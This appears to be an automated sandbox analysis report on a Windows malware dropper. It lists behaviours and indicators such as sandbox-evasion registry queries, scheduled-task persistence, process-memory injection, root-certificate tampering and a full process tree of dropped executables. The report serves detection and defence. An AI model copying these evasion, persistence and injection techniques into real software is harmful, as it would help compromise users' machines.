Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 23 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 2084 1060 WerFault.exe rUNdlL32.eXe 3000 3528 WerFault.exe arnatic_1.exe 4688 1368 WerFault.exe 4_yza4q88bogYk_cF59XJjyz.exe 4332 4252 WerFault.exe 5RLR8rS_aMkp6xiTBY96V6aV.exe 4656 1420 WerFault.exe ezokegez.exe 3060 1368 WerFault.exe 4_yza4q88bogYk_cF59XJjyz.exe 4840 5044 WerFault.exe yAQm8Ifhb_rMkM7EhIDqbE9y.exe 5144 1368 WerFault.exe 4_yza4q88bogYk_cF59XJjyz.exe 4944 4900 WerFault.exe CPH9q07r6cXvJsVI_KM1RiOL.exe 5100 5004 WerFault.exe 1JL6JbXANF8tluJUl1I2mYPT.exe 5860 5044 WerFault.exe yAQm8Ifhb_rMkM7EhIDqbE9y.exe 6120 4900 WerFault.exe CPH9q07r6cXvJsVI_KM1RiOL.exe 972 1368 WerFault.exe 4_yza4q88bogYk_cF59XJjyz.exe 5396 5004 WerFault.exe 1JL6JbXANF8tluJUl1I2mYPT.exe 5568 4148 WerFault.exe hO5xKfTb0uXbbkS86n6An9zN.exe 3700 1332 WerFault.exe PPjZFTHQLVGLf4MI9ZI7vFA6.exe 5156 1368 WerFault.exe 4_yza4q88bogYk_cF59XJjyz.exe 5872 4148 WerFault.exe hO5xKfTb0uXbbkS86n6An9zN.exe 5052 4148 WerFault.exe hO5xKfTb0uXbbkS86n6An9zN.exe 1612 1332 WerFault.exe PPjZFTHQLVGLf4MI9ZI7vFA6.exe 4572 4148 WerFault.exe hO5xKfTb0uXbbkS86n6An9zN.exe 6040 5884 WerFault.exe svchost.exe 5976 5788 WerFault.exe conhost.exe -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
AFC2.exearnatic_2.exedescription ioc process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI AFC2.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI AFC2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI arnatic_2.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI arnatic_2.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI arnatic_2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI AFC2.exe -
Checks processor information in registry 2 TTPs 33 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
4_yza4q88bogYk_cF59XJjyz.exeTovKtHieW7V9aCT7Dk2QoIn9.exePPjZFTHQLVGLf4MI9ZI7vFA6.exe5NhVWerLeg2JkPgGASqWBTL4.exed3381037-203a-43e3-9362-b9ca4e152f72.execmd.exeZcZKv3wUd95iiqEdR8N8GIp7.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Revision 4_yza4q88bogYk_cF59XJjyz.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString TovKtHieW7V9aCT7Dk2QoIn9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString PPjZFTHQLVGLf4MI9ZI7vFA6.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 4_yza4q88bogYk_cF59XJjyz.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Previous Update Revision 4_yza4q88bogYk_cF59XJjyz.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz 4_yza4q88bogYk_cF59XJjyz.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Previous Update Revision 4_yza4q88bogYk_cF59XJjyz.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier 4_yza4q88bogYk_cF59XJjyz.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 TovKtHieW7V9aCT7Dk2QoIn9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 5NhVWerLeg2JkPgGASqWBTL4.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 4_yza4q88bogYk_cF59XJjyz.exe Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor 4_yza4q88bogYk_cF59XJjyz.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information 4_yza4q88bogYk_cF59XJjyz.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier 4_yza4q88bogYk_cF59XJjyz.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier d3381037-203a-43e3-9362-b9ca4e152f72.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data 4_yza4q88bogYk_cF59XJjyz.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision 4_yza4q88bogYk_cF59XJjyz.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz 4_yza4q88bogYk_cF59XJjyz.exe Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 4_yza4q88bogYk_cF59XJjyz.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\FeatureSet 4_yza4q88bogYk_cF59XJjyz.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Status 4_yza4q88bogYk_cF59XJjyz.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString cmd.exe Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 4_yza4q88bogYk_cF59XJjyz.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString ZcZKv3wUd95iiqEdR8N8GIp7.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 cmd.exe Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 d3381037-203a-43e3-9362-b9ca4e152f72.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 4_yza4q88bogYk_cF59XJjyz.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Status 4_yza4q88bogYk_cF59XJjyz.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 ZcZKv3wUd95iiqEdR8N8GIp7.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor 4_yza4q88bogYk_cF59XJjyz.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Component Information 4_yza4q88bogYk_cF59XJjyz.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 5NhVWerLeg2JkPgGASqWBTL4.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 PPjZFTHQLVGLf4MI9ZI7vFA6.exe -
Creates scheduled task(s) 1 TTPs 22 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 4956 schtasks.exe 5224 schtasks.exe 4488 schtasks.exe 4548 schtasks.exe 4592 schtasks.exe 4712 schtasks.exe 5016 schtasks.exe 4516 schtasks.exe 4468 schtasks.exe 4520 schtasks.exe 4948 schtasks.exe 5000 schtasks.exe 4984 schtasks.exe 4568 schtasks.exe 4904 schtasks.exe 5104 schtasks.exe 5384 schtasks.exe 3176 schtasks.exe 4788 schtasks.exe 6076 schtasks.exe 1448 schtasks.exe 5392 schtasks.exe -
Delays execution with timeout.exe 5 IoCs
Processes:
timeout.exetimeout.exetimeout.exetimeout.exetimeout.exepid process 5056 timeout.exe 5160 timeout.exe 4544 timeout.exe 4256 timeout.exe 1332 timeout.exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
Processes:
tasklist.exetasklist.exepid process 1404 tasklist.exe 5064 tasklist.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
Processes:
Install.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Kills process with taskkill 3 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exepid process 5580 taskkill.exe 6008 taskkill.exe 3880 taskkill.exe -
Modifies registry class 2 IoCs
Processes:
8zeYyAhCLyy4MXuHDcnSZuq6.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ 8zeYyAhCLyy4MXuHDcnSZuq6.exe Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings 8zeYyAhCLyy4MXuHDcnSZuq6.exe -
Processes:
arnatic_1.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 arnatic_1.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e arnatic_1.exe -
Runs .reg file with regedit 1 IoCs
Processes:
Regedit.exepid process 4108 Regedit.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
arnatic_2.exejfiag3g_gg.exe8zeYyAhCLyy4MXuHDcnSZuq6.exepid process 1660 arnatic_2.exe 1660 arnatic_2.exe 2252 jfiag3g_gg.exe 2252 jfiag3g_gg.exe 3020 3020 3020 3020 3020 3020 3020 3020 3020 3020 3020 3020 3020 3020 3020 3020 3020 3020 3020 3020 3020 3020 3020 3020 3020 3020 3020 3020 2072 8zeYyAhCLyy4MXuHDcnSZuq6.exe 3020 3020 3020 3020 3020 3020 3020 3020 3020 3020 3020 3020 3020 3020 3020 3020 3020 3020 3020 3020 3020 3020 3020 3020 3020 3020 3020 3020 3020 3020 3020 -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 3020 -
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
arnatic_2.exeAFC2.exepid process 1660 arnatic_2.exe 1968 AFC2.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
arnatic_5.exeMSBuild.exe8zeYyAhCLyy4MXuHDcnSZuq6.exearnatic_7.exed3381037-203a-43e3-9362-b9ca4e152f72.exe8zeYyAhCLyy4MXuHDcnSZuq6.exeWaaSMedicAgent.exeETuSLYkVQqOjTT_usPKsVG0_.exeZxU30FwtSCAQFKpXqBqFaTKQ.exepowershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 3700 arnatic_5.exe Token: SeDebugPrivilege 2120 MSBuild.exe Token: SeShutdownPrivilege 3020 Token: SeCreatePagefilePrivilege 3020 Token: SeDebugPrivilege 2072 8zeYyAhCLyy4MXuHDcnSZuq6.exe Token: SeDebugPrivilege 3192 arnatic_7.exe Token: SeShutdownPrivilege 3020 Token: SeCreatePagefilePrivilege 3020 Token: SeShutdownPrivilege 3020 Token: SeCreatePagefilePrivilege 3020 Token: SeShutdownPrivilege 3020 Token: SeCreatePagefilePrivilege 3020 Token: SeShutdownPrivilege 3020 Token: SeCreatePagefilePrivilege 3020 Token: SeShutdownPrivilege 3020 Token: SeCreatePagefilePrivilege 3020 Token: SeShutdownPrivilege 3020 Token: SeCreatePagefilePrivilege 3020 Token: SeDebugPrivilege 4336 d3381037-203a-43e3-9362-b9ca4e152f72.exe Token: SeShutdownPrivilege 3020 Token: SeCreatePagefilePrivilege 3020 Token: SeShutdownPrivilege 3020 Token: SeCreatePagefilePrivilege 3020 Token: SeDebugPrivilege 4548 8zeYyAhCLyy4MXuHDcnSZuq6.exe Token: SeShutdownPrivilege 3020 Token: SeCreatePagefilePrivilege 3020 Token: SeShutdownPrivilege 3020 Token: SeCreatePagefilePrivilege 3020 Token: SeDebugPrivilege 5080 WaaSMedicAgent.exe Token: SeShutdownPrivilege 3020 Token: SeCreatePagefilePrivilege 3020 Token: SeDebugPrivilege 4200 ETuSLYkVQqOjTT_usPKsVG0_.exe Token: SeShutdownPrivilege 3020 Token: SeCreatePagefilePrivilege 3020 Token: SeShutdownPrivilege 3020 Token: SeCreatePagefilePrivilege 3020 Token: SeShutdownPrivilege 3020 Token: SeCreatePagefilePrivilege 3020 Token: SeShutdownPrivilege 3020 Token: SeCreatePagefilePrivilege 3020 Token: SeShutdownPrivilege 3020 Token: SeCreatePagefilePrivilege 3020 Token: SeDebugPrivilege 1600 ZxU30FwtSCAQFKpXqBqFaTKQ.exe Token: SeShutdownPrivilege 3020 Token: SeCreatePagefilePrivilege 3020 Token: SeShutdownPrivilege 3020 Token: SeCreatePagefilePrivilege 3020 Token: SeShutdownPrivilege 3020 Token: SeCreatePagefilePrivilege 3020 Token: SeShutdownPrivilege 3020 Token: SeCreatePagefilePrivilege 3020 Token: SeDebugPrivilege 5268 powershell.exe Token: SeDebugPrivilege 3848 powershell.exe Token: SeDebugPrivilege 5344 powershell.exe Token: SeShutdownPrivilege 3020 Token: SeCreatePagefilePrivilege 3020 Token: SeShutdownPrivilege 3020 Token: SeCreatePagefilePrivilege 3020 Token: SeShutdownPrivilege 3020 Token: SeCreatePagefilePrivilege 3020 Token: SeDebugPrivilege 5440 powershell.exe Token: SeShutdownPrivilege 3020 Token: SeCreatePagefilePrivilege 3020 Token: SeShutdownPrivilege 3020 -
Suspicious use of FindShellTrayWindow 7 IoCs
Processes:
Accostarmi.exe.pifpid process 4220 Accostarmi.exe.pif 3020 3020 4220 Accostarmi.exe.pif 4220 Accostarmi.exe.pif 3020 3020 -
Suspicious use of SendNotifyMessage 3 IoCs
Processes:
Accostarmi.exe.pifpid process 4220 Accostarmi.exe.pif 4220 Accostarmi.exe.pif 4220 Accostarmi.exe.pif -
Suspicious use of SetWindowsHookEx 5 IoCs
Processes:
8zeYyAhCLyy4MXuHDcnSZuq6.exe8zeYyAhCLyy4MXuHDcnSZuq6.exeWaaSMedicAgent.exeAeDLshJf0BYumx9Wg7E57LU8.exepid process 2072 8zeYyAhCLyy4MXuHDcnSZuq6.exe 4548 8zeYyAhCLyy4MXuHDcnSZuq6.exe 5080 WaaSMedicAgent.exe 1632 AeDLshJf0BYumx9Wg7E57LU8.exe 5080 WaaSMedicAgent.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
8019e48ea4193330275a481783506e84dc5085ca9d6e5e53aee1c60e035e19ca.exesetup_installer.exesetup_install.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exearnatic_7.exearnatic_4.exe8zeYyAhCLyy4MXuHDcnSZuq6.exedescription pid process target process PID 2388 wrote to memory of 3808 2388 8019e48ea4193330275a481783506e84dc5085ca9d6e5e53aee1c60e035e19ca.exe setup_installer.exe PID 2388 wrote to memory of 3808 2388 8019e48ea4193330275a481783506e84dc5085ca9d6e5e53aee1c60e035e19ca.exe setup_installer.exe PID 2388 wrote to memory of 3808 2388 8019e48ea4193330275a481783506e84dc5085ca9d6e5e53aee1c60e035e19ca.exe setup_installer.exe PID 3808 wrote to memory of 3532 3808 setup_installer.exe setup_install.exe PID 3808 wrote to memory of 3532 3808 setup_installer.exe setup_install.exe PID 3808 wrote to memory of 3532 3808 setup_installer.exe setup_install.exe PID 3532 wrote to memory of 648 3532 setup_install.exe cmd.exe PID 3532 wrote to memory of 648 3532 setup_install.exe cmd.exe PID 3532 wrote to memory of 648 3532 setup_install.exe cmd.exe PID 3532 wrote to memory of 2748 3532 setup_install.exe cmd.exe PID 3532 wrote to memory of 2748 3532 setup_install.exe cmd.exe PID 3532 wrote to memory of 2748 3532 setup_install.exe cmd.exe PID 3532 wrote to memory of 2776 3532 setup_install.exe cmd.exe PID 3532 wrote to memory of 2776 3532 setup_install.exe cmd.exe PID 3532 wrote to memory of 2776 3532 setup_install.exe cmd.exe PID 3532 wrote to memory of 2672 3532 setup_install.exe cmd.exe PID 3532 wrote to memory of 2672 3532 setup_install.exe cmd.exe PID 3532 wrote to memory of 2672 3532 setup_install.exe cmd.exe PID 3532 wrote to memory of 3868 3532 setup_install.exe cmd.exe PID 3532 wrote to memory of 3868 3532 setup_install.exe cmd.exe PID 3532 wrote to memory of 3868 3532 setup_install.exe cmd.exe PID 3532 wrote to memory of 3872 3532 setup_install.exe cmd.exe PID 3532 wrote to memory of 3872 3532 setup_install.exe cmd.exe PID 3532 wrote to memory of 3872 3532 setup_install.exe cmd.exe PID 3532 wrote to memory of 3852 3532 setup_install.exe cmd.exe PID 3532 wrote to memory of 3852 3532 setup_install.exe cmd.exe PID 3532 wrote to memory of 3852 3532 setup_install.exe cmd.exe PID 3852 wrote to memory of 2940 3852 cmd.exe arnatic_7.exe PID 3852 wrote to memory of 2940 3852 cmd.exe arnatic_7.exe PID 3852 wrote to memory of 2940 3852 cmd.exe arnatic_7.exe PID 3868 wrote to memory of 3700 3868 cmd.exe arnatic_5.exe PID 3868 wrote to memory of 3700 3868 cmd.exe arnatic_5.exe PID 2672 wrote to memory of 1900 2672 cmd.exe arnatic_4.exe PID 2672 wrote to memory of 1900 2672 cmd.exe arnatic_4.exe PID 2672 wrote to memory of 1900 2672 cmd.exe arnatic_4.exe PID 3872 wrote to memory of 2136 3872 cmd.exe arnatic_6.exe PID 3872 wrote to memory of 2136 3872 cmd.exe arnatic_6.exe PID 3872 wrote to memory of 2136 3872 cmd.exe arnatic_6.exe PID 2748 wrote to memory of 1660 2748 cmd.exe arnatic_2.exe PID 2748 wrote to memory of 1660 2748 cmd.exe arnatic_2.exe PID 2748 wrote to memory of 1660 2748 cmd.exe arnatic_2.exe PID 648 wrote to memory of 3528 648 cmd.exe arnatic_1.exe PID 648 wrote to memory of 3528 648 cmd.exe arnatic_1.exe PID 648 wrote to memory of 3528 648 cmd.exe arnatic_1.exe PID 2776 wrote to memory of 2072 2776 cmd.exe arnatic_3.exe PID 2776 wrote to memory of 2072 2776 cmd.exe arnatic_3.exe PID 2776 wrote to memory of 2072 2776 cmd.exe arnatic_3.exe PID 2940 wrote to memory of 3192 2940 arnatic_7.exe arnatic_7.exe PID 2940 wrote to memory of 3192 2940 arnatic_7.exe arnatic_7.exe PID 2940 wrote to memory of 3192 2940 arnatic_7.exe arnatic_7.exe PID 1900 wrote to memory of 776 1900 arnatic_4.exe jfiag3g_gg.exe PID 1900 wrote to memory of 776 1900 arnatic_4.exe jfiag3g_gg.exe PID 1900 wrote to memory of 776 1900 arnatic_4.exe jfiag3g_gg.exe PID 2072 wrote to memory of 1060 2072 8zeYyAhCLyy4MXuHDcnSZuq6.exe rUNdlL32.eXe PID 2072 wrote to memory of 1060 2072 8zeYyAhCLyy4MXuHDcnSZuq6.exe rUNdlL32.eXe PID 2072 wrote to memory of 1060 2072 8zeYyAhCLyy4MXuHDcnSZuq6.exe rUNdlL32.eXe PID 2940 wrote to memory of 3192 2940 arnatic_7.exe arnatic_7.exe PID 2940 wrote to memory of 3192 2940 arnatic_7.exe arnatic_7.exe PID 2940 wrote to memory of 3192 2940 arnatic_7.exe arnatic_7.exe PID 2940 wrote to memory of 3192 2940 arnatic_7.exe arnatic_7.exe PID 2940 wrote to memory of 3192 2940 arnatic_7.exe arnatic_7.exe PID 1900 wrote to memory of 2252 1900 arnatic_4.exe jfiag3g_gg.exe PID 1900 wrote to memory of 2252 1900 arnatic_4.exe jfiag3g_gg.exe PID 1900 wrote to memory of 2252 1900 arnatic_4.exe jfiag3g_gg.exe -
Views/modifies file attributes 1 TTPs 3 IoCs
Processes:
attrib.exeattrib.exeattrib.exepid process 2744 attrib.exe 1324 attrib.exe 776 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\8019e48ea4193330275a481783506e84dc5085ca9d6e5e53aee1c60e035e19ca.exe"C:\Users\Admin\AppData\Local\Temp\8019e48ea4193330275a481783506e84dc5085ca9d6e5e53aee1c60e035e19ca.exe"1⤵
- DcRat
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c arnatic_2.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\arnatic_2.exearnatic_2.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c arnatic_6.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\arnatic_6.exearnatic_6.exe5⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\Documents\8zeYyAhCLyy4MXuHDcnSZuq6.exe"C:\Users\Admin\Documents\8zeYyAhCLyy4MXuHDcnSZuq6.exe"6⤵
- DcRat
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\yfXLZxBfsx.bat"7⤵
-
C:\Windows\SysWOW64\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:28⤵
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:29⤵
-
C:\Users\Admin\Documents\8zeYyAhCLyy4MXuHDcnSZuq6.exe"C:\Users\Admin\Documents\8zeYyAhCLyy4MXuHDcnSZuq6.exe"8⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Documents and Settings\WaaSMedicAgent.exe"C:\Documents and Settings\WaaSMedicAgent.exe"9⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\HZ0653dQL6eKaM3PHHhKvs1i.exe"C:\Users\Admin\Documents\HZ0653dQL6eKaM3PHHhKvs1i.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\d3381037-203a-43e3-9362-b9ca4e152f72.exe"C:\Users\Admin\AppData\Local\Temp\d3381037-203a-43e3-9362-b9ca4e152f72.exe"7⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\4_yza4q88bogYk_cF59XJjyz.exe"C:\Users\Admin\Documents\4_yza4q88bogYk_cF59XJjyz.exe"6⤵
- Executes dropped EXE
- Checks processor information in registry
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#617⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1368 -s 6007⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1368 -s 9447⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1368 -s 9527⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1368 -s 10367⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1368 -s 8687⤵
- Program crash
-
C:\Users\Admin\Documents\ETuSLYkVQqOjTT_usPKsVG0_.exe"C:\Users\Admin\Documents\ETuSLYkVQqOjTT_usPKsVG0_.exe"6⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\Lxjwaytgkwrfchptbandzip.exe"C:\Users\Admin\AppData\Local\Temp\Lxjwaytgkwrfchptbandzip.exe"7⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe7⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe7⤵
-
